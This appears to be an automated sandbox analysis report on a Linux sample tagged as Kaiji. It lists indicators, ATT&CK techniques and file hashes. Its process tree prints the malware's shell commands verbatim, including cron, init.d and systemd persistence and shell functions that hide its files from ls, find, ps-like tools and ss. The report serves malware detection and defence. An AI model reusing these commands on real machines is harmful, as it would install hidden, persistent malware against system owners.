9198853b8713560503a4b76d9b854722183a94f6e9b2a46c06cd2865ced329f7

Analysis

max time kernel
149s
max time network
144s
platform
ubuntu-22.04_amd64
resource
ubuntu2204-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu2204-amd64-20240611-enkernel:5.15.0-105-genericlocale:en-usos:ubuntu-22.04-amd64system
submitted
21-08-2024 03:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b1f2d1ae2588c850f2ad884f473ef965_JaffaCakes118
Size

4.2MB
MD5

b1f2d1ae2588c850f2ad884f473ef965
SHA1

4a52da41696d8d662d15d6b286c38c72e56a6f37
SHA256

9198853b8713560503a4b76d9b854722183a94f6e9b2a46c06cd2865ced329f7
SHA512

40d7c81f6996f7b5d0b533e12b912d9c221ebb3fbb59d8602c639984c8e98b43d91600276844dc5ebdf25d07f1ef3f3f543c755d4005f4cd48f54a7f06fdfcab
SSDEEP

49152:iqLo4EIbMflJAqxyskB3nf+gDwmsHfqR0qigsZt6PfGj0SY:iqLoSmJANnf707U

Score

10^/10

persistence

Malware Config

Signatures

Kaiji 1 IoCs

Kaiji payload

resource	yara_rule
behavioral1/files/fstream-6.dat	Kaiji

Executes dropped EXE 5 IoCs

ioc	pid	Process
/etc/32679	1599	32679
/etc/id.services.conf	1705	id.services.conf
/etc/id.services.conf	1814	id.services.conf
/etc/id.services.conf	1819	id.services.conf
/etc/id.services.conf	1834	id.services.conf

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

persistence

Scheduled Task/Job

T1053

description	ioc	Process
File opened for modification	/etc/crontab	bash

Creates/modifies environment variables 1 TTPs 8 IoCs

Creating/modifying environment variables is a common persistence mechanism.

persistence

Hijack Execution Flow

T1574

description	ioc	Process
File opened for modification	/etc/profile.d/linux.sh	bash
File opened for modification	/etc/profile.d/bash_config	b1f2d1ae2588c850f2ad884f473ef965_JaffaCakes118
File opened for modification	/etc/profile.d/linux.sh	bash
File opened for modification	/etc/profile.d/linux.sh	bash
File opened for modification	/etc/profile.d/linux.sh	bash
File opened for modification	/etc/profile.d/bash_config.sh	b1f2d1ae2588c850f2ad884f473ef965_JaffaCakes118
File opened for modification	/etc/profile.d/linux.sh	bash
File opened for modification	/etc/profile.d/linux.sh	bash

Enumerates running processes
Discovers information about currently running processes on the system

Modifies init.d 1 TTPs 2 IoCs

Adds/modifies system service, likely for persistence.

persistence

Boot or Logon Autostart Execution

T1547

description	ioc	Process
File opened for modification	/etc/init.d/linux_kill	bash
File opened for modification	/etc/init.d/ssh	b1f2d1ae2588c850f2ad884f473ef965_JaffaCakes118

Modifies systemd 1 TTPs 1 IoCs

Adds/ modifies systemd service files. Likely to achieve persistence.

persistence

Boot or Logon Autostart Execution

T1547

description	ioc	Process
File opened for modification	/etc/systemd/system/linux.service	bash

Write file to user bin folder 1 TTPs 6 IoCs

Hijack Execution Flow

T1574

description	ioc	Process
File opened for modification	/usr/bin/ls	b1f2d1ae2588c850f2ad884f473ef965_JaffaCakes118
File opened for modification	/usr/bin/dir	b1f2d1ae2588c850f2ad884f473ef965_JaffaCakes118
File opened for modification	/usr/bin/find	b1f2d1ae2588c850f2ad884f473ef965_JaffaCakes118
File opened for modification	/usr/bin/lsof	b1f2d1ae2588c850f2ad884f473ef965_JaffaCakes118
File opened for modification	/usr/bin/ps	b1f2d1ae2588c850f2ad884f473ef965_JaffaCakes118
File opened for modification	/usr/bin/ss	b1f2d1ae2588c850f2ad884f473ef965_JaffaCakes118

Modifies Bash startup script 1 TTPs 8 IoCs

persistence

Boot or Logon Autostart Execution

T1547

description	ioc	Process
File opened for modification	/etc/profile.d/linux.sh	bash
File opened for modification	/etc/profile.d/bash_config.sh	b1f2d1ae2588c850f2ad884f473ef965_JaffaCakes118
File opened for modification	/etc/profile.d/linux.sh	bash
File opened for modification	/etc/profile.d/linux.sh	bash
File opened for modification	/etc/profile.d/linux.sh	bash
File opened for modification	/etc/profile.d/bash_config	b1f2d1ae2588c850f2ad884f473ef965_JaffaCakes118
File opened for modification	/etc/profile.d/linux.sh	bash
File opened for modification	/etc/profile.d/linux.sh	bash

Reads CPU attributes 1 TTPs 9 IoCs

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	top
File opened for reading	/sys/devices/system/cpu/online	top
File opened for reading	/sys/devices/system/cpu/online	top
File opened for reading	/sys/devices/system/cpu/online	top
File opened for reading	/sys/devices/system/cpu/online	top
File opened for reading	/sys/devices/system/cpu/online	top
File opened for reading	/sys/devices/system/cpu/online	top
File opened for reading	/sys/devices/system/cpu/online	top
File opened for reading	/sys/devices/system/cpu/online	top

Enumerates kernel/hardware configuration 1 TTPs 33 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/kernel/mm/transparent_hugepage/hpage_pmd_size	id.services.conf
File opened for reading	/sys/devices/system/node/node0/meminfo	top
File opened for reading	/sys/devices/system/cpu	top
File opened for reading	/sys/devices/system/node	top
File opened for reading	/sys/devices/system/node	top
File opened for reading	/sys/devices/system/node/node0/meminfo	top
File opened for reading	/sys/kernel/mm/transparent_hugepage/hpage_pmd_size	id.services.conf
File opened for reading	/sys/devices/system/node/node0/meminfo	top
File opened for reading	/sys/devices/system/cpu	top
File opened for reading	/sys/devices/system/node	top
File opened for reading	/sys/devices/system/node/node0/meminfo	top
File opened for reading	/sys/devices/system/cpu	top
File opened for reading	/sys/kernel/mm/transparent_hugepage/hpage_pmd_size	b1f2d1ae2588c850f2ad884f473ef965_JaffaCakes118
File opened for reading	/sys/kernel/mm/transparent_hugepage/hpage_pmd_size	b1f2d1ae2588c850f2ad884f473ef965_JaffaCakes118
File opened for reading	/sys/kernel/mm/transparent_hugepage/hpage_pmd_size	id.services.conf
File opened for reading	/sys/devices/system/node	top
File opened for reading	/sys/devices/system/node/node0/meminfo	top
File opened for reading	/sys/devices/system/cpu	top
File opened for reading	/sys/devices/system/cpu	top
File opened for reading	/sys/devices/system/cpu	top
File opened for reading	/sys/devices/system/node	top
File opened for reading	/sys/devices/system/cpu	top
File opened for reading	/sys/devices/system/node/node0/meminfo	top
File opened for reading	/sys/kernel/mm/transparent_hugepage/hpage_pmd_size	id.services.conf
File opened for reading	/sys/devices/system/node	top
File opened for reading	/sys/devices/system/node	top
File opened for reading	/sys/devices/system/cpu	top
File opened for reading	/sys/devices/system/node	top
File opened for reading	/sys/devices/system/node	top
File opened for reading	/sys/devices/system/node/node0/meminfo	top
File opened for reading	/sys/devices/system/node/node0/meminfo	top
File opened for reading	/sys/devices/system/node/node0/meminfo	top
File opened for reading	/sys/devices/system/cpu	top

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/1281/stat	top
File opened for reading	/proc/665/stat	top
File opened for reading	/proc/412/statm	top
File opened for reading	/proc/377/stat	top
File opened for reading	/proc/1317/statm	top
File opened for reading	/proc/1043/statm	top
File opened for reading	/proc/114/stat	top
File opened for reading	/proc/20/statm	top
File opened for reading	/proc/805/stat	top
File opened for reading	/proc/1043/stat	top
File opened for reading	/proc/6/statm	top
File opened for reading	/proc/2/stat	top
File opened for reading	/proc/97/statm	top
File opened for reading	/proc/409/statm	top
File opened for reading	/proc/760/statm	top
File opened for reading	/proc/1217/statm	top
File opened for reading	/proc/1432/statm	top
File opened for reading	/proc/meminfo	top
File opened for reading	/proc/506/stat	top
File opened for reading	/proc/417/stat	top
File opened for reading	/proc/19/stat	top
File opened for reading	/proc/1217/stat	top
File opened for reading	/proc/196/stat	top
File opened for reading	/proc/75/statm	top
File opened for reading	/proc/923/stat	top
File opened for reading	/proc/1190/stat	top
File opened for reading	/proc/1341/stat	top
File opened for reading	/proc/1354/stat	top
File opened for reading	/proc/110/stat	top
File opened for reading	/proc/1159/statm	top
File opened for reading	/proc/1087/stat	top
File opened for reading	/proc/82/statm	top
File opened for reading	/proc/764/stat	top
File opened for reading	/proc/1113/statm	top
File opened for reading	/proc/80/stat	top
File opened for reading	/proc/409/statm	top
File opened for reading	/proc/75/statm	top
File opened for reading	/proc/9/stat	top
File opened for reading	/proc/1156/stat	top
File opened for reading	/proc/589/statm	top
File opened for reading	/proc/212/statm	top
File opened for reading	/proc/78/stat	top
File opened for reading	/proc/78/stat	top
File opened for reading	/proc/208/statm	top
File opened for reading	/proc/971/stat	top
File opened for reading	/proc/sys/kernel/osrelease	top
File opened for reading	/proc/98/statm	top
File opened for reading	/proc/10/stat	top
File opened for reading	/proc/88/stat	top
File opened for reading	/proc/740/statm	top
File opened for reading	/proc/1193/stat	top
File opened for reading	/proc/204/statm	top
File opened for reading	/proc/113/statm	top
File opened for reading	/proc/73/stat	top
File opened for reading	/proc/13/statm	top
File opened for reading	/proc/97/statm	top
File opened for reading	/proc/25/stat	top
File opened for reading	/proc/101/stat	top
File opened for reading	/proc/1260/statm	top
File opened for reading	/proc/81/stat	top
File opened for reading	/proc/1354/statm	top
File opened for reading	/proc/412/statm	top
File opened for reading	/proc/1037/stat	top
File opened for reading	/proc/594/statm	top

/tmp/b1f2d1ae2588c850f2ad884f473ef965_JaffaCakes118
/tmp/b1f2d1ae2588c850f2ad884f473ef965_JaffaCakes118
1⤵
- Enumerates kernel/hardware configuration
PID:1562
- /tmp/b1f2d1ae2588c850f2ad884f473ef965_JaffaCakes118
  /tmp/b1f2d1ae2588c850f2ad884f473ef965_JaffaCakes118
  2⤵
  - Creates/modifies environment variables
  - Modifies init.d
  - Write file to user bin folder
  - Modifies Bash startup script
  - Enumerates kernel/hardware configuration
  PID:1565
- - /usr/bin/bash
    /usr/bin/bash -c "echo \"#!/bin/sh\" > /etc/profile.d/linux.sh"
    3⤵
    - Creates/modifies environment variables
    - Modifies Bash startup script
    PID:1571
- - /usr/bin/bash
    /usr/bin/bash -c "echo -e \"#!/bin/sh\\nwhile [ 1 ]; do\\nsleep 30\\n/etc/id.services.conf\\ndone\\n\" > /etc/32679"
    3⤵
    PID:1573
- - /usr/bin/bash
    /usr/bin/bash -c "echo -e \"#!/bin/sh\\n/usr/lib/libdlrpcld.so\" > /.img"
    3⤵
    PID:1572
- - /usr/bin/bash
    /usr/bin/bash -c "echo -e \"\\nfunction ss { proc_name=\\\$(/usr/bin/ss \\\$@);proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/b1f2d1ae2588c850f2ad884f473ef965_JaffaCakes118/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/linux_kill/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/linux.service/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/System.img.config/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/linux.sh/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/32679/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/23333/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/.img/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/libdlrpcld.so/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/id.services.conf/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/system-monitor/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/ifconfig.conf/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/sleep/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/seeintlog/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/bash_config/d');echo \\\"\\\$proc_name\\\"; }\" >> /etc/profile.d/linux.sh"
    3⤵
    - Creates/modifies environment variables
    - Modifies Bash startup script
    PID:1576
- - /usr/bin/bash
    /usr/bin/bash -c "echo -e \"#!/bin/sh\\n### BEGIN INIT INFO\\n#chkconfig: 2345 10 90\\n#description:System.img.config\\n# Default-Start: 2 3 4 5\\n# Default-Stop: \\n### END INIT INFO\\n/boot/System.img.config\\nexit 0\" > /etc/init.d/linux_kill;chmod +x /etc/init.d/linux_kill"
    3⤵
    - Modifies init.d
    PID:1577
- - /usr/bin/bash
    /usr/bin/bash -c "chmod 0755 /etc/32679"
    3⤵
    PID:1578
- - /usr/bin/chmod
    chmod 0755 /etc/32679
    3⤵
    PID:1578
- - /usr/bin/chmod
    chmod +x /etc/init.d/linux_kill
    3⤵
    PID:1577
- - /usr/bin/bash
    /usr/bin/bash -c "echo \"* * * * * root /.img \" >> /etc/crontab"
    3⤵
    - Creates/modifies Cron job
    PID:1580
- - /usr/bin/bash
    /usr/bin/bash -c "ln -s /etc/rc.d/init.d/linux_kill /etc/rc.d/rc0.d/linux_kill"
    3⤵
    PID:1581
- - /usr/bin/bash
    /usr/bin/bash -c "echo -e \"\\nfunction dir { proc_name=\\\$(/usr/bin/dir \\\$@);proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/b1f2d1ae2588c850f2ad884f473ef965_JaffaCakes118/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/linux_kill/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/linux.service/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/System.img.config/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/linux.sh/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/32679/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/23333/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/.img/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/libdlrpcld.so/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/id.services.conf/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/system-monitor/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/ifconfig.conf/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/sleep/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/seeintlog/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/bash_config/d');echo \\\"\\\$proc_name\\\"; }\" >> /etc/profile.d/linux.sh"
    3⤵
    - Creates/modifies environment variables
    - Modifies Bash startup script
    PID:1582
- - /usr/bin/ln
    ln -s /etc/rc.d/init.d/linux_kill /etc/rc.d/rc0.d/linux_kill
    3⤵
    PID:1581
- - /usr/bin/bash
    /usr/bin/bash -c "ln -s /etc/init.d/linux_kill /etc/rc0.d/linux_kill"
    3⤵
    PID:1586
- - /usr/bin/ln
    ln -s /etc/init.d/linux_kill /etc/rc0.d/linux_kill
    3⤵
    PID:1586
- - /usr/bin/bash
    /usr/bin/bash -c "ln -s /etc/rc.d/init.d/linux_kill /etc/rc.d/rc1.d/linux_kill"
    3⤵
    PID:1587
- - /usr/bin/ln
    ln -s /etc/rc.d/init.d/linux_kill /etc/rc.d/rc1.d/linux_kill
    3⤵
    PID:1587
- - /usr/bin/bash
    /usr/bin/bash -c "ln -s /etc/init.d/linux_kill /etc/rc1.d/linux_kill"
    3⤵
    PID:1588
- - /usr/bin/ln
    ln -s /etc/init.d/linux_kill /etc/rc1.d/linux_kill
    3⤵
    PID:1588
- - /usr/bin/bash
    /usr/bin/bash -c "ln -s /etc/rc.d/init.d/linux_kill /etc/rc.d/rc2.d/linux_kill"
    3⤵
    PID:1589
- - /usr/bin/ln
    ln -s /etc/rc.d/init.d/linux_kill /etc/rc.d/rc2.d/linux_kill
    3⤵
    PID:1589
- - /usr/bin/bash
    /usr/bin/bash -c "ln -s /etc/init.d/linux_kill /etc/rc2.d/linux_kill"
    3⤵
    PID:1590
- - /usr/bin/ln
    ln -s /etc/init.d/linux_kill /etc/rc2.d/linux_kill
    3⤵
    PID:1590
- - /usr/bin/bash
    /usr/bin/bash -c "ln -s /etc/rc.d/init.d/linux_kill /etc/rc.d/rc3.d/linux_kill"
    3⤵
    PID:1591
- - /usr/bin/bash
    /usr/bin/bash -c "chmod 0755 /.img"
    3⤵
    PID:1593
- - /usr/bin/bash
    /usr/bin/bash -c "echo -e \"\\nfunction ls { proc_name=\\\$(/usr/bin/ls \\\$@);proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/b1f2d1ae2588c850f2ad884f473ef965_JaffaCakes118/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/linux_kill/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/linux.service/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/System.img.config/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/linux.sh/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/32679/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/23333/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/.img/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/libdlrpcld.so/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/id.services.conf/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/system-monitor/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/ifconfig.conf/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/sleep/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/seeintlog/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/bash_config/d');echo \\\"\\\$proc_name\\\"; }\" >> /etc/profile.d/linux.sh"
    3⤵
    - Creates/modifies environment variables
    - Modifies Bash startup script
    PID:1592
- - /usr/bin/ln
    ln -s /etc/rc.d/init.d/linux_kill /etc/rc.d/rc3.d/linux_kill
    3⤵
    PID:1591
- - /usr/bin/chmod
    chmod 0755 /.img
    3⤵
    PID:1593
- - /usr/bin/bash
    /usr/bin/bash -c "ln -s /etc/init.d/linux_kill /etc/rc3.d/linux_kill"
    3⤵
    PID:1595
- - /usr/bin/bash
    /usr/bin/bash -c "echo -e \"\\nfunction find { proc_name=\\\$(/usr/bin/find \\\$@);proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/b1f2d1ae2588c850f2ad884f473ef965_JaffaCakes118/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/linux_kill/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/linux.service/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/System.img.config/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/linux.sh/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/32679/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/23333/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/.img/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/libdlrpcld.so/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/id.services.conf/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/system-monitor/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/ifconfig.conf/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/sleep/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/seeintlog/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/bash_config/d');echo \\\"\\\$proc_name\\\"; }\" >> /etc/profile.d/linux.sh"
    3⤵
    - Creates/modifies environment variables
    - Modifies Bash startup script
    PID:1597
- - /usr/bin/ln
    ln -s /etc/init.d/linux_kill /etc/rc3.d/linux_kill
    3⤵
    PID:1595
- - /usr/bin/bash
    /usr/bin/bash -c "echo -e \"\\nfunction lsof { proc_name=\\\$(/usr/bin/lsof \\\$@);proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/b1f2d1ae2588c850f2ad884f473ef965_JaffaCakes118/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/linux_kill/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/linux.service/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/System.img.config/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/linux.sh/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/32679/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/23333/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/.img/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/libdlrpcld.so/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/id.services.conf/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/system-monitor/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/ifconfig.conf/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/sleep/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/seeintlog/d');proc_name=\\\$(echo \\\"\\\$proc_name\\\" | sed -e '/bash_config/d');echo \\\"\\\$proc_name\\\"; }\" >> /etc/profile.d/linux.sh"
    3⤵
    - Creates/modifies environment variables
    - Modifies Bash startup script
    PID:1598
- - /etc/32679
    /etc/32679
    3⤵
    - Executes dropped EXE
    PID:1599
  - - /usr/bin/sleep
      sleep 30
      4⤵
      PID:1601
  - - /etc/id.services.conf
      /etc/id.services.conf
      4⤵
      Executes dropped EXE
      Enumerates kernel/hardware configuration
      PID:1705
  - - /usr/bin/sleep
      sleep 30
      4⤵
      PID:1709
  - - /etc/id.services.conf
      /etc/id.services.conf
      4⤵
      Executes dropped EXE
      Enumerates kernel/hardware configuration
      PID:1814
  - - /usr/bin/sleep
      sleep 30
      4⤵
      PID:1818
  - - /etc/id.services.conf
      /etc/id.services.conf
      4⤵
      Executes dropped EXE
      Enumerates kernel/hardware configuration
      PID:1819
  - - /usr/bin/sleep
      sleep 30
      4⤵
      PID:1823
  - - /etc/id.services.conf
      /etc/id.services.conf
      4⤵
      Executes dropped EXE
      Enumerates kernel/hardware configuration
      PID:1834
  - - /usr/bin/sleep
      sleep 30
      4⤵
      PID:1838
- - /usr/bin/bash
    /usr/bin/bash -c "ln -s /etc/rc.d/init.d/linux_kill /etc/rc.d/rc4.d/linux_kill"
    3⤵
    PID:1600
- - /usr/bin/ln
    ln -s /etc/rc.d/init.d/linux_kill /etc/rc.d/rc4.d/linux_kill
    3⤵
    PID:1600
- - /usr/bin/bash
    /usr/bin/bash -c "ln -s /etc/init.d/linux_kill /etc/rc4.d/linux_kill"
    3⤵
    PID:1602
- - /usr/bin/ln
    ln -s /etc/init.d/linux_kill /etc/rc4.d/linux_kill
    3⤵
    PID:1602
- - /usr/bin/bash
    /usr/bin/bash -c "ln -s /etc/rc.d/init.d/linux_kill /etc/rc.d/rc5.d/linux_kill"
    3⤵
    PID:1603
- - /usr/bin/ln
    ln -s /etc/rc.d/init.d/linux_kill /etc/rc.d/rc5.d/linux_kill
    3⤵
    PID:1603
- - /usr/bin/bash
    /usr/bin/bash -c "ln -s /etc/init.d/linux_kill /etc/rc5.d/linux_kill"
    3⤵
    PID:1604
- - /usr/bin/ln
    ln -s /etc/init.d/linux_kill /etc/rc5.d/linux_kill
    3⤵
    PID:1604
- - /usr/bin/bash
    /usr/bin/bash -c "ln -s /etc/rc.d/init.d/linux_kill /etc/rc.d/rc6.d/linux_kill"
    3⤵
    PID:1605
- - /usr/bin/ln
    ln -s /etc/rc.d/init.d/linux_kill /etc/rc.d/rc6.d/linux_kill
    3⤵
    PID:1605
- - /usr/bin/bash
    /usr/bin/bash -c "ln -s /etc/init.d/linux_kill /etc/rc6.d/linux_kill"
    3⤵
    PID:1606
- - /usr/bin/ln
    ln -s /etc/init.d/linux_kill /etc/rc6.d/linux_kill
    3⤵
    PID:1606
- - /usr/bin/bash
    /usr/bin/bash -c "ln -s /etc/init.d/linux_kill /etc/rcS.d/linux_kill"
    3⤵
    PID:1607
- - /usr/bin/ln
    ln -s /etc/init.d/linux_kill /etc/rcS.d/linux_kill
    3⤵
    PID:1607
- - /usr/bin/bash
    /usr/bin/bash -c "update-rc.d linux_kill defaults;chkconfig --add linux_kill"
    3⤵
    PID:1608
  - - /usr/sbin/update-rc.d
      update-rc.d linux_kill defaults
      4⤵
      PID:1609
    - - /usr/local/sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:1610
    - - /usr/local/bin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:1610
    - - /usr/sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:1610
    - - /usr/bin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:1610
- - /usr/bin/bash
    /usr/bin/bash -c "echo -e \"[Unit]\\nDescription=\\n[Service]\\nType=forking\\nExecStart=/boot/System.img.config\\nExecReload=/boot/System.img.config\\nExecStop=/boot/System.img.config\\n[Install]\\nWantedBy=multi-user.target\" > /etc/systemd/system/linux.service;chmod +x /etc/systemd/system/linux.service;systemctl enable linux.service"
    3⤵
    - Modifies systemd
    PID:1660
  - - /usr/bin/chmod
      chmod +x /etc/systemd/system/linux.service
      4⤵
      PID:1661
- - /usr/bin/systemctl
    systemctl enable linux.service
    3⤵
    PID:1660
- - /usr/bin/top
    top -b "-n 1" "-d 1"
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:1839
- - /usr/bin/top
    top -b "-n 1" "-d 1"
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:1840
- - /usr/bin/top
    top -b "-n 1" "-d 1"
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:1841
- - /usr/bin/top
    top -b "-n 1" "-d 1"
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:1849
- - /usr/bin/top
    top -b "-n 1" "-d 1"
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:1850
- - /usr/bin/top
    top -b "-n 1" "-d 1"
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:1851
- - /usr/bin/top
    top -b "-n 1" "-d 1"
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:1852
- - /usr/bin/top
    top -b "-n 1" "-d 1"
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:1853
- - /usr/bin/top
    top -b "-n 1" "-d 1"
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:1854

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Hijack Execution Flow

T1574

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Hijack Execution Flow

T1574

Scheduled Task/Job

T1053

Defense Evasion

Hijack Execution Flow

T1574

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/.img

Filesize
33B

MD5
094229936952a5efee42fa0ea6a7050c

SHA1
d5a12a43558dad22e883ac93b46a53def44ddf22

SHA256
66639b6f3a51c65e5c04e244a45c6138d7ae42b57b66d74fc65b55d13611f5c9

SHA512
ba66c8e65332834953ff46044173891373015b2e8ef615aba0dc70042630aa59d874510a43aec1247fb7bb7e2bd387ef9c65fb3f80bdd66f4a4b8177f2d22180

Download Submit
/etc/32679

Filesize
63B

MD5
9a9f98b59b29f755355896d1a5abc62b

SHA1
43a1763d7fbe9a9227ae3a53238939970204a7fe

SHA256
221020b4e2c975077e4f6c14fd97fd79b92fe1fedc4e7d58b320f96bee3a1a76

SHA512
8c0b2dfaf1cda52c03a3ea1ef0d0e1510811268abefefdf5820c75ae1d5ebfcb8407f68faf78e79c8485d8af0f41c712bb1b956e49db7e60336e776bf8c1b45f

Download Submit
/etc/init.d/linux_kill

Filesize
175B

MD5
a0b9825cdc2b62e47f22d2edd93faba6

SHA1
c903b07fbd57c34087e5d69217e9d989b6f16aec

SHA256
50f4dabf587064077659e2d921b1606ce357d493deccf62bec03063dd41665c0

SHA512
4187c71a7dc60cf2450869df5bd3e81c77c56791e032b2bd32580423eb89b81745b4558623fa50a0249f251d7c782827e2e7fe8dbdeb57de542f213c85f09dc9

Download Submit
/etc/profile.d/bash_config.sh

Filesize
36B

MD5
02eee8e70dc10bf8d1949e3bb9ef8ca7

SHA1
b44885ae5deebb06f99eef17977966a25dd95eb0

SHA256
c3e9598512d5a2832a6b4122ac2a98a10f68355a7b802e6775028b037bf79687

SHA512
d945d6c95c67a0b9527fd8aaa674d890180ae311b3c07d380cfa20514254f56c331576d77f24ff87d7f1811b9be406b641557b6ace25fb58564d1f8ddaf30e36

Download Submit
/etc/profile.d/linux.sh

Filesize
1KB

MD5
d8aa701959290c546c6ca074f18381c5

SHA1
8e78014162a246abc5cb522c6fc5e58f79f03e22

SHA256
89de65f62ae26ee9cd1342b44832efeda92fdf8786731233a088c732a701ffe1

SHA512
601244b1c503c1112c00bbea00ef613f25c63b0eba680c73a10955735789c2605bc299a303cfab9dc68bab56935f858e6a0bf3d8666b9ad9510f9a322d3d028c

Download Submit
/etc/profile.d/linux.sh

